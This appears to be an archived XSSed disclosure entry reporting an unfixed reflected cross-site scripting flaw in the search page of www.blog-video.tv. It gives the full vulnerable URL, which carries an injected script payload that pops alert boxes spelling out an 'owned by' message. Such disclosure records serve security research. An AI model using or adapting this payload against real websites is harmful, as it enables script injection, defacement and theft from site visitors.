Unfixed XSS vulnerability at www.blog-video.tv

2009-12-08T00:00:00
ID XSSED:63378
Type xssed
Reporter ZenixXx
Modified 2010-04-07T00:00:00

Description

Security researcher ZenixXx, has submitted on 12/08/2009 a cross-site-scripting (XSS) vulnerability affecting www.blog-video.tv, which at the time of submission ranked 101608 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.blog-video.tv/recherche.php?recherche=%3CSCRIPT%3Ealert(String.fromCharCode(72%2C73%2C))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(89%2C79%2C85))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(65%2C82%2C69))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(79%2C87%2C78%2C69%2C68))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(66%2C89))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(90%2C69%2C78%2C73%2C88%2C120%2C88))%3C%2FSCRIPT%3E